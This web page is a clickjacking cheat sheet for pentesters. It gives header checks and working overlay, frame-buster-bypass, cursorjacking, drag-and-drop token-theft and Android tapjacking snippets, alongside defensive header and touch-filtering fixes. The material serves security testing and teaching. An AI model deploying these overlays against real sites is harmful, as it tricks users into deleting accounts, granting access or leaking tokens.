Clickjacking Cheat Sheet

Copy-ready clickjacking techniques for authorized pentests and bug bounty: detecting framing, frame-buster bypass, X-Frame-Options/CSP frame-ancestors testing, PoC overlays, drag-and-drop data theft, and mobile tapjacking. (36 payloads)

Try it interactively with the HTTP Header Analyzer

Detection & Recon

(6)

curl -sI https://target.tld/ | grep -iE 'x-frame-options|content-security-policy'

Dump the anti-framing headers in one shot. If neither X-Frame-Options nor a CSP frame-ancestors directive is present, the page is framable by default and is a clickjacking candidate.Absence of BOTH is the bug. A weak X-Frame-Options (ALLOW-FROM, or no XFO but CSP present) still needs per-browser testing.

<!doctype html><iframe src="https://target.tld/sensitive-action" width=900 height=700></iframe>

Minimal framing test. Save as test.html, open in a browser, and watch the network tab. If the target renders inside the iframe (not blank / not refused), it is vulnerable.Chrome/Firefox log a console error like 'Refused to display ... in a frame because it set X-Frame-Options to DENY' when protected.

curl -s https://target.tld/ | grep -iE 'top\.location|self !?== ?top|frameElement|window\.top'

Grep the HTML for JavaScript frame-busting logic. Client-side frame busters are bypassable; their presence (instead of a header) usually means the defense is weak.Common patterns: if (top != self) top.location = self.location; or if (top.location != location) ...

Test per-action, not just '/'. Frame the actual state-changing endpoints: /account/delete, /transfer, /settings/email, /oauth/authorize.

Many apps set XFO on the login page but forget it on deep links, OAuth consent screens, admin panels, or AJAX-rendered fragments. Enumerate sensitive POST/GET targets individually.OAuth/SSO consent pages are high-value: a framed 'Authorize' click can grant an attacker app access.

burp: Repeater -> strip request, resend -> check 'X-Frame-Options' & 'Content-Security-Policy' on the RESPONSE for each endpoint

Use Burp to walk every interesting response and confirm the anti-framing header is actually returned by the server (CDNs, error pages, and redirects often drop it).Headers can vary by path, auth state, and method — re-check authenticated vs unauthenticated responses.

X-Frame-Options: ALLOW-FROM https://trusted.tld

ALLOW-FROM is obsolete and ignored by Chrome and modern Edge (only old Firefox/IE honored it). A site relying solely on ALLOW-FROM is effectively unprotected in current browsers.The modern replacement is CSP frame-ancestors. Flag ALLOW-FROM as a finding even though it 'looks' configured.

X-Frame-Options & CSP frame-ancestors

(7)

X-Frame-Options: DENY

Strongest XFO value — the page can never be framed, even by itself. Verify it is sent on the response, not just configured in a template, and that it survives redirects.DENY > SAMEORIGIN for pages that never need self-framing.

X-Frame-Options: SAMEORIGIN

Allows framing only from the same origin. Bypassable if the app has a same-origin open redirect, an HTML-injection/XSS sink, or a same-origin page that itself frames the target (double-framing nuance differs per browser).Chrome historically only checked the top-level frame's origin for SAMEORIGIN, enabling nested-frame bypasses in some versions.

Content-Security-Policy: frame-ancestors 'none'

CSP equivalent of DENY and the recommended modern control. Unlike XFO it supports multiple sources and is checked for every ancestor in the frame chain, blocking nested-frame bypasses.frame-ancestors is NOT covered by default-src — it must be set explicitly or no framing protection applies.

Content-Security-Policy: frame-ancestors 'self' https://*.partner.tld

Wildcard/sub-domain ancestors widen the attack surface: if any allowed subdomain has stored XSS or an open redirect, an attacker can frame the target from there.Audit every host in frame-ancestors — one takeoverable or XSS-prone subdomain breaks the whole control.

Header set on page A but missing on AJAX fragment B that A injects

SPAs frequently protect the shell page but serve framable HTML fragments/partials from endpoints without anti-framing headers. Frame the fragment endpoint directly.Check /api/*, /partials/*, /render/*, and any endpoint returning Content-Type: text/html.

frame-ancestors present but XFO absent (or vice-versa) — test in MULTIPLE browsers

Coverage differs by browser/version. If only one control is set, confirm enforcement in Chrome, Firefox, and Safari separately; a gap in one browser is still exploitable against that user base.Best practice is BOTH XFO: DENY/SAMEORIGIN and CSP frame-ancestors for defense in depth.

<meta http-equiv="X-Frame-Options" content="DENY">

X-Frame-Options in a <meta> tag does NOTHING — XFO is only honored as an HTTP response header. A meta-only configuration is a false sense of security; report it as unprotected.Unlike CSP, XFO has no valid <meta http-equiv> form. Only the real header counts.

Frame-Buster Bypass

(6)

<iframe sandbox="allow-forms allow-scripts allow-same-origin" src="https://target.tld"></iframe>

Omitting 'allow-top-navigation' from the sandbox iframe blocks the framed page's frame-buster from calling top.location, neutralizing the classic 'top = self' redirect while still allowing the form/click to work.Keep allow-forms/allow-scripts so the victim UI is interactive; just deny top-navigation. The original HTML5 sandbox frame-busting bypass.

<iframe src="..." onload="setInterval(function(){var i=document.getElementById('f'); i.src=i.src;},10)"> (counter-reload)

Some legacy frame busters use a slow redirect; rapidly re-asserting the frame src or counter-navigating with a 204 redirect (onbeforeunload abuse) can win the race before the buster fires.Modern approach: prefer the sandbox method above — race conditions are flaky across browsers.

window.onbeforeunload = function(){ return 'stay?'; } // attacker page prompts before the buster navigates away

Abuse the onbeforeunload dialog: when the frame buster tries to set top.location, the parent's onbeforeunload handler shows a confirm dialog that can cancel the navigation, defeating the buster.Modern browsers restrict onbeforeunload text and require user interaction, reducing reliability — historical technique.

<iframe security="restricted" src="https://target.tld"></iframe> (legacy IE)

Internet Explorer's non-standard security=restricted attribute disabled JavaScript in the framed page, killing JS frame busters entirely. IE-era only.Document it for legacy/enterprise IE engagements; irrelevant on modern browsers.

Why JS frame busting fails: it is in-page code an attacker can sandbox, race, or strip — it is NOT a browser-enforced control.

Core finding to report: client-side frame busting is defense-in-name-only. The correct fix is server-sent X-Frame-Options and/or CSP frame-ancestors, which the browser enforces before rendering.Even a 'correct' top.location buster is bypassable via sandbox; recommend headers, not JS.

Server-side defense the buster SHOULD pair with:\nif (top != self) { document.documentElement.style.display='none'; if (top.location != self.location) top.location = self.location; }

The least-bad JS pattern (hide body first, then navigate) still loses to a sandboxed iframe. Use it only as a fallback alongside headers — never as the primary control.OWASP's recommended legacy snippet, but explicitly secondary to frame-ancestors/XFO.

PoC Construction & Overlays

(6)

<style>iframe{position:absolute;top:0;left:0;width:100%;height:100%;opacity:0.0;z-index:2}
#decoy{position:absolute;top:300px;left:380px;z-index:1}</style>
<button id=decoy>Click to win a prize!</button>
<iframe src="https://target.tld/account/delete"></iframe>

Canonical overlay PoC: the transparent (opacity:0) target iframe sits above an enticing decoy. Position the iframe so the real 'Delete'/'Confirm' button lands exactly over the decoy. The victim clicks the prize, hits the hidden button.Switch opacity to ~0.3 during development to align the iframe over the decoy, then set 0 for the live PoC.

iframe { transform: scale(5); transform-origin: 0 0; }

Scale-up trick: magnify the framed page so a tiny target button fills a large clickable region, then clip with a small overflow:hidden wrapper so only the button shows under the cursor.Combine with a wrapper div using overflow:hidden + fixed width/height to crop to just the button.

<div style="overflow:hidden;width:120px;height:40px;position:absolute;top:200px;left:200px"><iframe src="https://target.tld/confirm" style="position:absolute;top:-540px;left:-260px;width:1200px;height:900px;opacity:0"></iframe></div>

Crop-and-position: a small overflow:hidden window over a large offset iframe exposes only the target button. Negative top/left scroll the iframe so the button aligns with the visible window.Adjust the negative offsets to slide the desired button into the cropped viewport.

<iframe src="https://target.tld/page#scroll-to-anchor"> + pointer-events trickery / cursor spoofing image

Cursorjacking: hide the real cursor (cursor:none) and draw a fake cursor offset by N pixels so the victim aims at the decoy while the true click lands on the hidden iframe button.Use a custom cursor image positioned via mousemove JS, offset from the actual pointer location.

Multi-step PoC: stack several positioned iframes / use load+reposition timers to chain clicks (e.g. open menu -> confirm).

Some actions need multiple clicks (open a dropdown, then confirm). Reposition the same iframe between clicks, or layer multiple decoys, to walk the victim through a multi-step flow.Reposition on each click via JS; keep instructions ('Click twice to claim!') believable.

PoC checklist: victim is authenticated in target.tld, action is state-changing & non-idempotent, no extra confirmation/CAPTCHA, no anti-CSRF that blocks framed clicks.

For a credible report, demonstrate impact end-to-end: a logged-in victim clicking your decoy actually performs the sensitive action (account deletion, fund transfer, OAuth grant, privacy toggle).If the action also needs a value the attacker can't set via UI alone, pivot to drag-and-drop (next section).

Drag-and-Drop & Data Extraction

(5)

ondragstart sets dataTransfer with attacker text; victim is tricked into dragging it INTO a framed input on target.tld

Drag-and-drop clickjacking moves attacker-controlled text across origins. A game-like 'drag the item' UI drops attacker data into a hidden framed form field, letting you inject values you otherwise couldn't set (e.g. a malicious email, comment, or address).The HTML5 drag-and-drop API is exempt from same-origin policy for the dragged payload, which is what makes this work.

<div draggable="true" ondragstart="event.dataTransfer.setData('text','[email protected]')">Drag me!</div>

Source element the victim drags. Its setData payload becomes the dropped content. Position a framed, transparent target input under the drop zone so the dropped text lands in the victim's profile/settings field.Pair with a hidden iframe of the target's editable field positioned at the drop target.

Reverse drag: victim drags FROM the framed page (e.g. selected secret/CSRF token) OUT to an attacker textarea

Drag the OTHER direction to steal data: trick the victim into selecting+dragging content rendered inside the framed target (a token, balance, PII) into an attacker-controlled drop zone, exfiltrating it cross-origin.Works against pages that render secrets in selectable text; the drag carries the selection across origins.

Content extraction via partial-text framing + drag selection of a known field position

Combine precise iframe positioning with a pre-seeded selection so a single drag grabs a specific field's value (e.g. a one-time anti-CSRF token) and drops it where your script can read it.Historically used to defeat CSRF tokens that clickjacking alone can't reach.

Defense note: drag-and-drop theft is blocked the same way as click theft — frame-ancestors/XFO prevent the framing entirely.

Because the attack still requires framing the target, anti-framing headers neutralize drag-based extraction too. Report it under the same root cause (missing frame protection).There is no separate 'anti-drag' header; fix the framing.

Tapjacking & Mobile

(6)

Android: malicious app overlays a transparent View (TYPE_APPLICATION_OVERLAY / old TYPE_SYSTEM_ALERT_WINDOW) on top of a sensitive UI

Tapjacking is mobile clickjacking: an overlay app draws a transparent/decoy layer above a real app (or permission dialog), so a tap meant for the decoy passes through to the underlying button (grant permission, confirm payment).Requires the SYSTEM_ALERT_WINDOW permission; Android 12+ and Play policy heavily restrict overlays.

android:filterTouchesWhenObscured="true" (per-View) / view.setFilterTouchesWhenObscured(true)

The primary Android defense: a View that opts in will DISCARD touch events received while it is partially or fully obscured by another window, defeating overlay tapjacking on sensitive buttons.Recommend setting this on every security-sensitive control (login, payment, permission confirm).

onFilterTouchEventForSecurity(MotionEvent) — check event.getFlags() & FLAG_WINDOW_IS_OBSCURED

For finer control, inspect FLAG_WINDOW_IS_OBSCURED / FLAG_WINDOW_IS_PARTIALLY_OBSCURED on incoming touches and reject them when an overlay is detected.Use when filterTouchesWhenObscured is too coarse (e.g. legitimate overlays exist).

WebView tapjacking: hybrid app loads framable web content -> same iframe overlay attack inside the WebView

Hybrid/mobile apps that render web pages in a WebView inherit web clickjacking risk. If the WebView content lacks frame-ancestors/XFO and can be framed by injected web content, the desktop techniques apply inside the app.Audit WebView-loaded URLs for the same anti-framing headers as the web app.

iOS: no general cross-app overlay -> tapjacking is largely an Android problem; focus iOS testing on WKWebView framing

iOS sandboxing prevents one app from drawing transparent overlays over another, so classic tapjacking does not translate. On iOS, concentrate on WKWebView-rendered web content being framable.Test the web origins loaded by the app, not cross-app overlays, on iOS.

Toast-overlay / accessibility-abuse variants (pre-fix Android): brief toasts redrawn to obscure dialogs

Older Android allowed Toast and accessibility-service tricks to obscure system dialogs without SYSTEM_ALERT_WINDOW. Patched in modern Android but relevant for legacy device/OS-version testing.Cloak & Dagger class of attacks — note OS version in scope; modern Android mitigates these.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

CSRF Cheat Sheet CORS Misconfiguration Cheat Sheet CSP Bypass Cheat Sheet Session & Cookie Attacks Cheat Sheet

Frequently asked questions

What is the Clickjacking Cheat Sheet?+

It's a quick-reference collection of 36 Clickjacking payloads for testing Clickjacking vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Clickjacking payloads?+

Copy any payload straight into your authorized test, or use the HTTP Header Analyzer to apply them interactively. Only test systems you have explicit permission to assess.

Are these Clickjacking payloads free to use?+

Yes — this cheat sheet and all Clickjacking payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Clickjacking Cheat Sheet?+

How do I use these Clickjacking payloads?+

Copy any payload straight into your authorized test, or use the HTTP Header Analyzer to apply them interactively. Only test systems you have explicit permission to assess.

Are these Clickjacking payloads free to use?+

Yes — this cheat sheet and all Clickjacking payloads are completely free, with no account required. Everything runs in your browser.

Clickjacking Cheat Sheet

Detection & Recon

X-Frame-Options & CSP frame-ancestors

Frame-Buster Bypass

PoC Construction & Overlays

Drag-and-Drop & Data Extraction

Tapjacking & Mobile

Related Tools

Related Cheat Sheets

Frequently asked questions

Clickjacking Cheat Sheet

Detection & Recon

X-Frame-Options & CSP frame-ancestors

Frame-Buster Bypass

PoC Construction & Overlays

Drag-and-Drop & Data Extraction

Tapjacking & Mobile

Related Tools

Related Cheat Sheets

Frequently asked questions